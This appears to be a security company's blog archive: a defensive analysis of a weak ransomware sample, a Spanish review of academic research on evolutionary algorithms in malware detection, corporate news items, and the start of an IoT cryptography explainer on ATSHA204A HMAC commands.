code. Partof the code where the password appears and how to decode it in base64. Click to enlarge The result of the decoding is the password that can be entered in the corresponding dialog to decrypt the data without having to pay at all. The rest of the code is sometimes messy, although it seems they are working day by day to improve it. For example, the salt in the cryptographic function is not random. This, which in any other circumstance would allow a precomputed dictionary attack, really does not have much effect here (the password is not in a dictionary, it is a hash), but it gives us an idea of the little cryptographic value that this ransomware has. A not very useful salt (12345678), although it is not very important here. HTML code The HTML code that is displayed to the victim forms a very important part of this malware. It is also embedded encoded in base64 in the code. In it we can see that a verification is conducted using the APIs of the Blockchain.info (misused, it encloses the wallet in quotation marks) in order to know if the payment has been made and if it is validated in the blockchain. It uses Satoshis, which are a fraction of a bitcoin. They misuse the API of Blockchain.info, although later they correct it If so, they display some URLs hidden in JavaScript that are supposed to give access to the decryption code, and hosted in the Tor network. This protection (using a "hide" class) is ridiculous. When we access the URLs, the truth is we cannot see any decryption code (we guess that because they are still in the trial stage). They are supposed to provide you with the decryption code when you pay and visit those URLs, but it does not look like it. Refer-a-friend plan What stands out the most about this is the "nasty way" to decrypt the files. Allegedly, if you send the executable link to two acquaintances and they pay, you will be given the unlock code. It is a very smart way to get a fast diffusion, but we think it is not true. The code does not contain any instructions to verify that this happens automatically. Unless all intelligence runs from the server side (which we doubt), we cannot guarantee (nor have we technically proven that it happens) that this is so and, therefore, this is more likely to be just a hoax to spread more malware. In fact, the generated executables do not contain information about who has recommended them, only the fact that they have been created under a URL that does indeed contain the ID of the initial victim. But looking at the entire system, its poor programming, unfulfilled promises, threatening countdowns that in the end do not erase a thing and the unstable infrastructure and "craftsmanship" in general, Occam's razor makes us lean to think that everything is false and that there is no mechanism to control this. Remember that we have a tool with an approximation of proactive protection against ransomware that you can (soon) download from our laboratory. Sergio de los Santos ssantos@11paths.com @ssantosv
15 de diciembre de 2016
Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (IV)
En esta serie de artículos se realizará un repaso a la literatura académica en la que se mezclan estos dos conceptos: malware y algoritmos evolutivos. Analizaremos de forma crítica qué trabajos y artículos se han presentado en orden cronológico durante los últimos años, para comprobar si realmente tiene sentido utilizar los algoritmos genéticos para mejorar cualquier aspecto de la lucha contra el malware, ya sea en detección, análisis, predicción… V eremos un buen montón de experimentos basado en la algoritmia evolutiva, que a su vez también resulta apasionante. Continuamos mostrando un resumen con espíritu crítico de nueve artículos académicos relativos a la materia, publicados todos de 2010 en adelante y en orden cronológico. Specialized Genetic Algorithm Based Simulation Tool Designed For Malware Evolution Forecasting En este artículo se modela un hipotético malware para Android basado en sus estrategias de difusión y otras características. Se utiliza un algoritmo genético para evolucionar las estrategias y se concluye que el cromosoma con mejor fitness (mejor capacidad de transmisión) podría ser el siguiente: El estudio resulta confuso, puesto que está basado en un estudio supuestamente anterior al que no se ha tenido acceso y muestran una herramienta con la que se han realizado experimentos y que no parece pública. En cualquier caso, teorizar sobre la evolución del malware puede resultar complicado. Actualmente, y con la perspectiva del tiempo, se puede comprobar que los métodos de difusión del malware móvil no están asociados al correo, BlueTooth o MMS, como predecía el estudio. Información codificada como gen en el estudio Support Vector Machine Integrated with Game-Theoretic Approach and Genetic Algorithm for the Detection and Classification of Malware En esta investigación se utilizan opcodes, bytes y n-grams para representar binarios. Los opcodes son la representación nemotécnica del lenguaje máquina (en este caso sin sus parámetros). Estos opcodes se representan como n-grams. Para construir los n-grams, se extraen los opcodes únicos y se estudia su frecuencia para construir un vector. Así, cada binario queda traducido en dos vectores con sus bytes y n-grams únicos. De estos vectores se extrae la funcionalidad esencial y se construye un clasificador usando Support Vector Machines como algoritmo. La combinación del clasificador se aborda como una tarea de toma de decisión que se resuelve con teoría de juegos para predecir la clase o sus probabilidades. En resumen, el algoritmo genético se utiliza para seleccionar las funcionalidades esenciales debido a la alta dimensionalidad del problema (los vectores, que son binarios según contengan una característica o no, son muy extensos), SVM como clasificador y finalmente una solución a la teoría de "Zero-sum game" para combinar los clasificadores. Para este estudio, la función de fitness se toma como la precisión de clasificación. Así, tras seleccionar la característica más esencial gracias al algoritmo genético (que maximiza la clasificación), se convierte el vector en un problema de juegos (zero-sum game), convirtiéndolo en una competición de clases. En este experimento se introduce una variación en el algoritmo para el caso de que no haya solución al juego. Resultados de la comparativa de clasificación del estudio Se utilizan modelos de 1-gram y 2-gram. En los casos de 2-gram, es cuando se usa algoritmia genética para reducir la dimensionalidad a menos de 1000. Finalmente se compara el propio algoritmo construido (llamado ZSGSVM) con otros que han usado otras técnicas de reducción de dimensionalidad. Los porcentajes de clasificación encontrados, tanto con opcodes como con bytes son muy similares, y funciona, como mucho, igual que otras combinaciones. Los propios autores reconocen que el cálculo por algoritmo genético lleva bastante tiempo. Por tanto, aunque no se menciona, parece que su uso no aporta nada relevante, puesto que como se muestra en la tabla, se obtienen resultados similares sin necesidad de usar algoritmos genéticos. Evolving Computational Intelligence System for Malware Detection Este estudio pretende detectar, con los mínimos recursos, si un archivo ha sido empaquetado para su ejecución. Esta es una técnica habitual entre los creadores de malware, con la ´única intención de dificultar su análisis manual o dinámico. Desarrollan un sistema llamado Evolving Computational Intelligence System for Malware Detection (ECISMD), que en realidad se trata de un sistema de clasificaci´on utilizando Evolving Spiking Neural Networks (eSNN) para detectar si está empaquetado por un lado, y por el otro un sistema llamado Evolving Classification Function (ECF basado en “fuzzy clustering") optimizado a través de algoritmos genéticos. Esquema general del estudio En este caso, tanto el modelo ECF como el algoritmo evolutivo forman parte de un software desarrollado por los propios investigadores. Los genes se van convirtiendo en la entrada al ECF, y este da salida a diferentes clases. Tras entrenarlo, se dispondría de las reglas necesarias para diferenciar entre empaquetado y no. La funcionalidad que se extrae de los candidatos se consigue con un análisis estático: número y nombre de secciones, entropía del código, etc. En este caso, solo se utiliza para, de forma muy rápida, detectar si se trata de un fichero empaquetado y sobre ellos, si es malware. Una vez desempaquetado se usa el ECF mejorado con algoritmos genéticos para detectar si es malware o no. El tiempo de clasificación se reduce considerablemente hasta los 0.00016 segundos por ejecutable. En la próxima entrega, estudiaremos las últimas tres investigaciones analizadas, antes de pasar a las conclusiones generales. * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (I) * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (II) * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (III) * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (IV) Sergio de los Santos ssantos@11paths.com @ssantosv
12 de diciembre de 2016
Colaboramos con el Gobierno de Reino Unido en su apuesta por la Ciberseguridad
Últimamente hemos leído en la prensa que el Gobierno del Reino Unido va a invertir más de 2.000 millones de euros a lo largo de los próximos cinco años para mejorar la Ciberseguridad del país, lo cual se suma a la apuesta equivalente de la Unión Europea, la cual anunció la liberación de 450 millones de euros en los próximos tres años dentro de un programa que generaría inversión por valor de 2.000 millones. En clara tendencia dentro del contexto global, en el que las inversiones en Ciberseguridad a nivel mundial van a crecer desde los 75.000 millones del año 2015 hasta los 170.000 millones de dólares estimados por los analistas de mercado para 2020. Una de las iniciativas del programa aprobado en Reino Unido consiste en la creación de dos nuevos centros de incubación de ideas innovadoras, que sean capaces de desarrollar nuevas soluciones aplicables al tratamiento inteligente de los datos, herramientas que refuercen la seguridad de los dispositivos y aplicaciones que los ciudadanos utilizan ya masivamente online, y que minimicen las posibilidades de sufrir ataques cibernéticos a todos los niveles. El GCHQ (Government Communications Headquarters), quien ya a través de su página web busca y recluta de forma activa nuevos talentos para luchar contra los ciber-delincuentes, recientemente seleccionó a Telefónica para poner en marcha el primero de los centros de innovación e incubación de startups. Este proyecto reconoce y avala la gran experiencia que Telefónica tiene en crear estos centros de innovación a través de su programa Open Future – Wayra y también en el ámbito de la seguridad a través de ElevenPaths, la unidad de Ciberseguridad del Grupo Telefónica, quien ya viene colaborando estrechamente desde hace mucho tiempo con otras entidades como INCIBE y OEA, o siendo miembro de grupos y organizaciones sin ánimo de lucro como la ECSO, desde donde la industria complementa y acompaña a las instituciones públicas en el desarrollo de la seguridad en el ciberespacio. Sede GCHQ en Reino Unido Otra buena noticia es que ya se empiezan a seleccionar candidatos, y una de las primeras empresas que van a formar parte de este programa será CounterCraft, cuya innovadora filosofía se basa en contrarrestar a los ciberdelicuentes no sólo repeliendo sus ataques, sino aprovechando de manera inteligente la información que tenemos sobre su ataque para confundirlos y controlarlos. Es decir, se trata de una empresa que desarrolla herramientas y métodos para contrarrestar los ataques cibernéticos a través de la contra-inteligencia. Me reconforta saber, como ciudadano europeo, que los gobiernos de este continente se empiezan a preocupar seriamente por la Ciberseguridad y creo que esta iniciativa contribuirá a posicionarnos posiblemente como un referente de innovación comparable a los Estados Unidos, Rusia o Israel. Además posibilitando que emprendedores de nuestros países puedan desarrollar sus ideas, impulsar su negocio y contribuir a la seguridad general del país, protegiendo a empresas y ciudadanos en el nuevo entorno digital. A día de hoy, sin duda EEUU lidera todos los rankings de inversión, con un foco claro en el área de Silicon Valley que se complementa con Nueva York, Boston y Austin. Fuera de los Estados Unidos, las ciudades con mayor crecimiento en inversión de Ciberseguridad son Londres y Tel Aviv, tal y como nos confirma Zach Cutler en uno de sus artículos. Espero que esta iniciativa además de contribuir a mejorar la seguridad informática en nuestro entorno profesional y personal sea también un aliciente para que Telefónica consiga posicionarse en el Reino Unido como un actor relevante en este campo y alcanzar el nivel de desarrollo de negocio en Ciberseguridad que ya tiene en España y en muchos de los países latinoamericanos. Pedro Pablo Pérez CEO de ElevenPaths @ppperez *También te puede interesar: Wayra UK impulsará el desarrollo de tecnología de ciberseguridad en el Reino Unido Telefónica se integra como la única telco en los órganos de decisión de la Organización Europea de Ciberseguridad
30 de noviembre de 2016
Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (III)
En esta serie de artículos se realizará un repaso a la literatura académica en la que se mezclan estos dos conceptos: malware y algoritmos evolutivos. Analizaremos de forma crítica qué trabajos y artículos se han presentado en orden cronológico durante los últimos años, para comprobar si realmente tiene sentido utilizar los algoritmos genéticos para mejorar cualquier aspecto de la lucha contra el malware, ya sea en detección, análisis, predicción… Veremos un buen montón de experimentos basado en la algoritmia evolutiva, que a su vez también resulta apasionante. Desde la última recopilación de 2009, se han vuelto a realizar diferentes experimentos que mezclan algoritmos evolutivos como herramienta para mejorar de algún modo la detección y clasificación de malware. Mostramos a continuación un resumen con espíritu crítico de nueve artículos académicos relativos a la materia, publicados todos de 2010 en adelante y en orden cronológico. Malware Detection based on Dependency Graph using Hybrid Genetic Algorithm Keehyung Kim y Byung-Ro Moon presentan en 2010 un mecanismo de detección de malware de script analizando los grafos de dependencia. La idea es modelizar el grafo de dependencia del malware (fundamentalmente creado en Visual Basic Script), y transformar el problema de detección en el de encontrar isomorfismos entre subgrafos de distintas variantes. Así, aunque el malware mute (modifique código con el fin específico de eludir una firma concreta), si mantiene la esencia de su estructura (algo necesario para garantizar su funcionalidad), podría ser detectado aunque el creador se esfuerce en eliminar su "firma". Lo interesante del experimento es resolver el problema de máximo isomorfismo entre grafos. Dos grafos lo son si se encuentra una biyección entre vértices que preserva la adyacencia entre nodos. Se desconoce un algoritmo éptimo (sin recurrir a la fuerza bruta de comprobar las n! biyecciones de nodos). Así que se recurre a algoritmos genéticos para solucionarlo en tiempo razonable. La elección de malware de script permite disponer de su código tal y como fue escrito por el atacante. En el estudio se trata, calcula y reduce el grafo de cada script (en el que cada nodo es una línea de código). Este se compara entre un candidato a malware, calculando su máximo isomorfismo. Si sobrepasa un umbral, se pasa a un algoritmo genético que intentará clasificarlo como malware o no. El algoritmo utiliza una representación lineal de los vértices para trabajar. Como función de fitness, se evalúa la diferencia entre aristas. Una diferencia de cero, denotaría que un grafo es un completo subgrafo de otro, y por tanto a menor diferencia, mejor fitness (se ha encontrado un programa que, aunque "disfrazado" sigue el mismo flujo). Para elegir a candidatos se utiliza la ruleta y para la mutación, se muta con probabilidad 0.2 el intercambiando genes (que representan la posición de la arista en la disposición). Al margen del algoritmo genético, se utilizan dos aproximaciones heurísticas para optimización local. La primera intercambia aristas al azar. La segunda simplemente reorganiza un vértice insertándolo en otra posición. En los experimentos usan la heurística (más rápida) como parapeto antes del algoritmo genético, obteniendo un buen resultado con ella simplemente. Para contrastar la eficacia de su sistema, l a habitual comparación contra los antivirus sugiere que el algoritmo mejora el ratio de detección con respecto a la mayoría de motores. El estudio no resulta demasiado interesante desde el punto de vista de la detección del malware en sí, tal y como está enfocado. Por diversas razones: Para que los resultados de uso de simple heurística sean alcanzados por el algoritmo genético, se utilizan 2000 generaciones como criterio de parada, lo que supone un coste computacional mucho mayor. No se ofrecen comparativas de tiempo al respecto en el artículo, pero se menciona que el coste de GA puede ser prohibitivo para sistemas que demanden una rápida respuesta. De hecho, en las propias conclusiones menciona que quizás podría utilizarse este mecanismo más lento para situaciones que no demanden una respuesta tan rápida, como la detección de copia de software en general. El uso en malware de script resulta en cierta manera ingenuo. Las muestras recogidas son muy simples (5 muestras), con cambios muy sencillos en su poliformismo (18 variantes en total). Más allá de los resultados, lo más interesante del estudio resulta la adaptación del software de script a grafos, el trabajo de su reducción y comparación buscando el isomorfismo. Optimizing Decision Tree in Malware Classification System by using Genetic Algorithm En este artículo, se utiliza un algoritmo genético como sistema de aprendizaje. En el estudio se intenta no tanto detectar malware, sino clasificar dentro de cuatro clases: Si la muestra estudiada ataca a los datos, aplicaciones, sistema o red. Lo llaman "Anti-Malware System Classifier". Se utilizan tanto árboles de decisión como un algoritmo genético para comparar resultados. La metodología consiste en clasificar las muestras aleatoriamente dentro de los cuatro grupos y calcular el fitness con la media de los pesos de cada individuo en el grupo. Se usan técnicas estándar para la mutación y cruce. De un total de mil ejemplos, se intentan clasificar 200, tomando 20 comportamientos sospechosos (analizados tras la ejecución en una máquina virtual) como base de características para su clasificación. Los resultados globales mejoran (tras pasar por el algoritmo genético de clasificación) los resultados del árbol de decisión. Este documento se complementa con la descripción del framework creado para poner en práctica los experimentos, y descrito (aunque de manera muy somera) en "A Framework for Optimizing Malware Classification by Using Genetic Algorithm" de 2011. El artículo resulta pobre en la descripción de detalles. La clasificación mejora con respecto a los árboles de decisión, pero solo para cuatro grupos y muy levemente. En el mejor de los casos se llega al 97% de precisión, con una tasa de falsos positivos excesivamente alta. Además, la clasificación del malware de esta forma (basada en qué ataca) no resulta tan interesante como la detección en sí misma. Adaptive rule-based malware detection employing learning classifier systems Se trata de una tesis en la que se analizan y experimenta con diferentes técnicas para la detección de malware basadas en árboles de decisión (usando el algoritmo C4.5) y LCS (Learning classifiying system) basados en algoritmos evolutivos (usando a su vez una variante de XCS para definir su fitness). En los algoritmos LCS las reglas son la población del algoritmo, y se centra en definir el mejor clasificador en ese conjunto de reglas. En cierta manera, un trabajo mucho más elaborado que los anteriores por su extensión, complejidad, minuciosidad, número de muestras empelados e intención específica de mejora. Compara el rendimiento del LCS (una adaptación propia de XCS) con diferentes métodos de inicialización, población, etc. La caracterización de las muestras (como es habitual) viene del estudio estático de funcionalidades propias de los archivos ejecutables. Aquí, son interesantes las siguientes conclusiones: LCS mejora la generalización con respecto a C4.5, y detecta mejor malware previamente no visto. LCS no sufre tanto del problema de límite de dimensionalidad que afecta a C4.5 Para los diferentes experimentos, LCS se inicializa con tres métodos diferentes: aleatorio, "covering" (se van creando reglas por cada fichero que llega y no queda clasificado) y la inicialización con C4.5, que parte de un conjunto de reglas ya generadas con ese algoritmo y mejoradas usando la función específica. Luego se usa C4.5 de nuevo como base comparativa. Sin embargo, el estudio parece basarse en unos datos muy pobres y por tanto no puede tomarse como representativo: todo el malware usado proviene de la familia Poison Ivy. Esto es el cliente de un conocido troyano y por tanto sin diversidad. Sería comparable a crear distinto malware (en el sentido de un fichero con hash diferente) desde un mismo programa. Posee la capacidad de mutar, pero su funcionalidad es fundamentalmente la misma con unas características concretas que lo definen y que por tanto, ya usan los motores antivirus como firmas de los antivirus para detectarlo eficazmente. Aunque no se compara específicamente contra sistemas antivirus, es más que probable que los motores consiguieran resultados más que aceptables ya con sus sistemas de firmas. Además, en el estudio no se habla del tiempo necesario para la creación de reglas, que puede ser de nuevo un impedimento para su uso en tiempo real. * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (I) * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (II) * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (III) * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (IV) Sergio de los Santos ssantos@11paths.com @ssantosv
28 de noviembre de 2016
ElevenPaths participamos en el F5 Fórum Madrid
Los últimos meses del año suelen concentrar mucha actividad en el mundo de los eventos y conferencias de seguridad. El próximo 30 de noviembre se celebra en Madrid el evento F5 Fórum Iberia, una jornada que desde ElevenPaths compartiremos junto con los principales socios tecnológicos de F5, como Cisco, FireEye, Gemalto, Microsoft, y Splunk. Durante el evento participaremos en las distintas sesiones tecnológicas con el fin de mostrar nuestras soluciones de seguridad. La alianza de ElevenPaths con F5 amplia la integración de nuestra tecnología Vamps con sistemas WAF que permite el parcheo en caliente de vulnerabilidades. Esta integración proporciona la capacidad de aplicar una técnica de Virtual Patching sobre su infraestructura. De este modo las vulnerabilidades detectadas por Vamps se mitigan automáticamente con la tecnología F5 BIG-IP ASM, lo que evita los ataques que emplean estas vulnerabilidades como vía de entrada. Esta integración automática consigue reducir el tiempo de exposición de las vulnerabilidades drásticamente, pasando de emplear días o semanas para solucionar una vulnerabilidad a horas o minutos. ElevenPaths participamos también con un stand donde puedes conocer nuestra tecnología para la gestión de vulnerabilidades, con una mesa redonda con nuestro experto Víctor Mundilla, una demo de soluciones de seguridad F5 y la integración con soluciones líderes de mercado así como la presentación de soluciones con la aplicación de un caso de uso. Si estás en Madrid, ¡no puedes faltar! Aquí puedes registrarte. ¡Nos vemos allí!
25 de noviembre de 2016
Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (II)
En esta serie de artículos se realizará un repaso a la literatura académica en la que se mezclan estos dos conceptos: malware y algoritmos evolutivos. Analizaremos de forma crítica qué trabajos y artículos se han presentado en orden cronológico durante los últimos años, para comprobar si realmente tiene sentido utilizar los algoritmos genéticos para mejorar cualquier aspecto de la lucha contra el malware, ya sea en detección, análisis, predicción… Veremos un buen montón de experimentos basado en la algoritmia evolutiva, que a su vez también resulta apasionante. A finales de 2009, se realiza un trabajo similar recopilando hasta esa fecha los artículos presentados que reunían estas características. En él, se analizan fundamentalmente cuatro trabajos que a su vez pasamos a describir brevemente, enfoncándolos con un carácter más crítico. A retrovirus inspired algorithm for virus detection & optimization Este estudio de 2006 juega con la idea de hacer evolucionar las firmas del malware para crear "anticuerpos". El concepto es el de usar algoritmos genéticos no tanto para afinar el clasificador (que como veremos más adelante sería el uso habitual) sino para hacer que el clasificador elija mejor las reglas que afinen su funcionamiento. Al margen de su utilidad real para detectar malware, lo interesante es cómo se evita que el algoritmo genético quede atascado en óptimos locales, añadiendo "memoria", esto es, añadiendo a los registros del algoritmo cierta información previa. El fitness se calcula midiendo la distancia entre las cadenas que representan las firmas, lo que supone ser muy optimista con respecto la fórmula con la que el malware se clasifica con firmas en general... No se ofrecen estadísticas reales de mejora o uso comparable con otros sistemas de firmas o sistemas de detección, lo que ofrece una idea de su utilidad real. De alguna manera, este artículo se complementaría en 2012 con un estudio y un programa creado por Carlos Nasillo específicamente para evolucionar firmas concretas de malware a través de algoritmos evolutivos y comparando literalmente las cadenas binarias de firmas de malware. Por el tipo de muestras utilizadas, los resultados obtenidos, el coste computacional, el enfoque utilizado y como el propio autor reconoce en el artículo que acompaña al software, no se obtiene mejora concreta o apreciable en la detección con este método. Algo que se intuye desde el planteamiento con el uso de firmas. In-execution Malware Analysis and Detection scheme (IMAD) En este estudio de 2009 se presenta la herramienta In-execution Malware Analysis and Detection scheme (IMAD). Se trata de una herramienta que pretende clasificar si un archivo binario para sistemas UNIX es malware o no. Las características de cada fichero se calculan extrayendo las llamadas a funciones de los binarios y agrupándolos en "n-grams". En resumen, los n-grams (que se usarán en estudios sucesivos) son subsecuencias de n "ítems" (en este caso conjuntos de llamadas a sistema) que se sobreponen unos a otros. Esta técnica es habitual en el estudio del malware, pues permite conocer qué conjunto de cadenas es lo suficientemente representativo como para suponer una “marca" que defina otros archivos similares y por tanto, permite clasificar. El papel de los algoritmos evolutivos aquí es de apoyo cuando el resto de clasificadores no se pronuncia, y conocer así qué "peso" tiene cada parámetro (n-gram) para definir el malware y "detectar" así el conjunto de llamadas que lo hace sospechoso. En los experimentos, se utilizan 100 muestras de malware y 180 de "goodware". A todas luces, una muestra insuficiente que invalidaría las conclusiones de cualquier análisis. La clasificación se compara con algoritmos de clasificación como Support Vector Machine, C4.5, Bayesianos y RIPPER. IMAD, apoyándose en algoritmos genéticos, obtiene unos resultados de éxito interesantes (no llegan al 90% de "accuracy"), aunque llama la atención que la optimización introducida con los algoritmos genéticos permite reducir la tasa de falsos positivos al 0% en algunos casos frente al resto. Aunque reducir los falsos positivos resulta especialmente atractivo, como se ha mencionado, con 100 muestras de malware los resultados de este informe en concreto no son relevantes. Evolvable malware En este artículo se utilizan algoritmos genéticos para "evolucionar el malware", representado como una serie de características de comportamiento. Una vez "evolucionado" (modificando o alterando parámetros, como por ejemplo el conjunto de acciones maliciosas que realiza) se genera el código máquina que lo representa y se comprueba de nuevo contra los motores antivirus. Durante la evolución (intercambiando funcionalidades), cuanto más se parecían los hijos al conjunto de malware test, mejor era su fitness. Dadas las restricciones intrínsecas del experimento (que busca funcionalidades concretas dentro del malware), se redujo al uso de una variante de Beagle. Se trata de un malware de 2004 muy polifacético (realizaba muchas acciones nocivas diferentes sobre el sistema) y del que se produjeron infinidad de variantes. Se convirtió en paradigma de la nueva ola de malware con fines económicos nacida en 2004, creada de forma profesional y muy modular. En este estudio se utilizan los algoritmos genéticos para generar de una manera controlada nuevos individuos, representados como un conjunto de funcionalidades. El concepto resulta interesante. On the Appropriateness of Evolutionary Rule Learning Algorithms for Malware Detection Uno de los trabajos más representativos quizás, se encuentra en este documento donde se experimenta con el uso de algoritmos evolutivos y no evolutivos de aprendizaje de reglas para la detección de malware. Se comparan los clasificadores evolutivos XCS, UCS, GAssist-ADI, GAssist-Intervalar y SLAVE contra los no evolutivos RIPPER, SLIPPER, PART, C4.5 y RIONA (todos presentes en el software KEEL. No solo se evalúa su "accuracy", sino también el número de reglas generadas, la comprensibilidad de las reglas (aunque resulte subjetivo, se pretende evaluar qué reglas resultarían útiles para un humano) y sobre todo, el tiempo necesario para los cálculos. La conclusión es muy interesante. Si bien todos los algoritmos se mueven en entornos aceptables por encima del 99% de precisión, es clara la diferencia: los no evolutivos son más precisos. De entre los evolutivos, GAssist-ADI y SLAVE tienen la mejor puntuación (que no supera a los no evolutivos), pero su tiempo de proceso los hace inutilizables para ofrecer una respuesta en tiempo real. UCS es el único que funciona con mejores tiempos, pero a costa de una precisión menor. En este estudio destaca el uso de 11.786 ejecutables para las pruebas de los que se extraen estáticamente 189 funcionalidades propias de los ejecutables (desde la versión del compilador, pasando por su timestamp a su tamaño). La conclusión final es que los algoritmos de aprendizaje evolutivos no mejoran la detección ni son usables en tiempo real. Veremos en la siguiente entrega, qué ha ocurrido desde 2009 en este campo, y qué otras investigaciones se han publicado en la literatura académica. * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (I) * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (II) * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (III) * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (IV) Sergio de los Santos ssantos@11paths.com @ssantosv
23 de noviembre de 2016
Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (I)
En esta serie de artículos se realizará un repaso a la literatura académica en la que se mezclan estos dos conceptos: malware y algoritmos evolutivos. Analizaremos de forma crítica qué trabajos y artículos se han presentado en orden cronológico durante los últimos años, para comprobar si realmente tiene sentido utilizar los algoritmos genéticos para mejorar cualquier aspecto de la lucha contra el malware, ya sea en detección, análisis, predicción… Veremos un buen montón de experimentos basado en la algoritmia evolutiva, que a su vez también resulta apasionante. Desde la década pasada, los algoritmos evolutivos y la programación genética han irrumpido con fuerza en la ingeniería informática. En una frase, los algoritmos evolutivos pretenden encontrar soluciones aplicando técnicas de cambio y mutación en una serie de planteamientos y comprobar si estos satisfacen mejor el problema. Si es así, estos mejores candidatos siguen modificándose de forma inteligente o aleatoria para dar con el candidato ideal que soluciona el problema. Pensemos en candidatos como vectores, por ejemplo. Esto permitiría solucionar problemas de forma rápida en vez de tener que usar la fuerza bruta recorriendo todas las posibilidades de un vector. Es una explicación burda, pero lo cierto es que los algoritmos genéticos tienen gran potencial. Tanto, que cuando se popularizaron hubo un momento de euforia en el que muchos pensaron que resolverían ciertos problemas intratables hasta el momento, hasta que se demostró que al final no había "free lunch" y que realmente no podían llegar a batir en todas las circunstancias a la búsqueda ciega. Estructura típica de un algoritmo evolutivo. Fuente: http://www.scielo.org.ve/scielo.php?script=sci_arttext&pid=S1316-48212006000400002 Por su versatilidad son usados en un amplio rango de campos pero quizás el análisis del malware podría prestarse especialmente a ser mejorado con este tipo de algoritmos, por varias razones: Clasificar y detectar el malware de forma eficiente es un grave problema de la informática en general. Desde mediados de la década pasada, ya no solo en entornos de escritorio sino también en dispositivos móviles, entornos industriales y como arma de la llamada "ciberguerra" en el que instituciones gubernamentales lo utilizan como método de espionaje o control. Los modelos tradicionalmente utilizados para detectar y catalogar malware han sido las "firmas" creadas por motores antivirus. Aunque efectivas en cierto grado con el malware común, resultan hoy en día eludibles por los atacantes desde el punto de vista técnico. El malware con fines económicos o logísticos pasa fácilmente desapercibido para los motores, puesto que sus creadores disponen de las herramientas necesarias (entre ellas el propio antivirus) para modificarlos y realizar diferentes versiones que no sean detectadas. La creación de malware ha crecido sustancialmente, tanto en número como en sofisticación y presencia, por lo que se manejan ya cientos millones de registros y muestras que catalogar y detectar. Esto dificulta el trabajo de los propios motores, que crean firmas más genéricas (y menos efectivas) para poder abarcar el máximo malware común. En un principio, el malware (tradicionalmente denominado "virus"), parece especialmente propenso a ser estudiado por algoritmos evolutivos, debido a que tradicionalmente se ha mostrado como una especie de organismo parasitario capaz de reproducirse y evolucionar, aunque ese modelo de malware no se utilice desde mediados de la década pasada. Estos factores hacen pensar que los algoritmos evolutivos en particular (especializados en resolver problemas muy complejos, con gran cantidad de datos y características) y el "machine learning" en general pueden dar la posibilidad de ofrecer una solución interesante en el campo del malware, bien detectando, evaluando, clasificando o incluso prediciendo sus capacidades y evoluciones. Pero... ¿es cierto? Conceptos previos En el mundo del malware, el sistema de firmas tradicional se utiliza para la clasificación y detección en general, y se basa en características concretas del binario que permitan identificarlo. Con ellas, si son extrapolables y significativas, se podría detectar más malware (y nuevas versiones) e intentar así clasificar muestras previamente desconocidas de forma más eficaz. El sistema de firmas se ve lastrado por depender de los recursos del laboratorio responsable del motor antivirus, que las genera de forma más o menos automatizada (a veces con intervención humana) y de manera reactiva (ante nuevas muestras que las eluden, se necesita estudiar cómo lo han conseguido para poder recrear las nuevas firmas). Pero si se eligen los atributos correctos al margen de las firmas más estáticas (una clasificación atendiendo a características más adecuadas), se podría realizar la clasificación de forma automática y (en teoría) más eficaz que las firmas (que habitualmente se restringen a cadenas concretas o combinación de código único encontrados en los binarios). Además, si bien las firmas suelen ser eludidas por los creadores de malware variando el código concreto que detecta el motor antivirus pero manteniendo la funcionalidad del malware, al tomar otras características basadas en funcionalidad u otros parámetros como referencia, se hace más complejo para un atacante poder evitarlas y pasar así inadvertido. En los artículos y experimentos que vamos a analizar se tratan varios casos de clasificación de binarios en malware o goodware. En ellos, el éxito se suele medir por el "accuracy" alcanzado en la clasificación. Es un dato que refleja el éxito de la clasificación (malware o goodware) pero que además aglutina los falsos positivos (goodware erróneamente clasificado como malware), falsos negativos (malware erróneamente clasificado como goodware), verdaderos negativos (goodware clasificado satisfactoriamente como goodware), y verdaderos positivos (malware clasificado satisfactoriamente como malware). Habitualmente se comparan los resultados contra la detección de motores antivirus u otros clasificadores para comprobar su eficacia. Debido a la existencia de un trabajo de recopilación previo similar realizado en 2009 por Christie Williams (aunque no con carácter crítico), a partir del siguiente artículo nos centraremos principalmente en cómo ha evolucionado el área desde entonces, con un exhaustivo repaso a la literatura académica. * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (I) * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (II) * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (III) * Algoritmos evolutivos y malware, ¿evolucionan los "virus"? (IV) Sergio de los Santos ssantos@11paths.com @ssantosv
19 de noviembre de 2016
Cryptographic Security in IoT (III)
The proliferation of IoT services platforms and devices is occurring much faster than the adoption of security measures in its field. In the face of the urgent need for mechanisms that guarantee the authentication, integrity and confidentiality, of both communications and the devices themselves, the trend is to transfer cryptographic solutions contrasted in traditional IT, such as public key digital certificates over SSL/TLS protocols. We are moving forward in the state-of-the-art of cryptography solutions for IoT. HMAC Calculation Execution of the HMAC command, as with other ATSHA204A commands, must precede execution of the Nonce command. The aim of the Nonce command is to populate the 32-byte internal register, called TempKey, by generating or loading a challenge, which will then be used in later commands. The Nonce command has three operating modes. 0x00 and 0x01 are the most common modes. In these modes, the Nonce command is invoked, providing it with a number of 20 bytes as an entry, to which it responds by returning a random number of 32 bytes that are generated internally as a challenge. The 20 received bytes are linked to the random number of 32 bytes, along with three more bytes: 0x16, the mode and 0x00. And based on the set of 55 bytes, the SHA-256 summary, which is stored in the TempKey, is calculated. Additionally, two binary registers are modified: TempKey.SourceFlag to 0, meaning random origin. TempKey.Valid, to 1, meaning that the TempKey is usable. The difference between the 0x00 and 0x01 mode is that in the second case the seed of the random number generator does not update, something that Atmel does not recommend. In 0x03 mode it is used to directly populate the TempKey, without generating a random number, or the SHA-256 calculation in bypass mode. If the Nonce command has finished satisfactorily, setting the TempKey.Valid bit to value 1, it is then possible to invoke the HMAC command. The call to 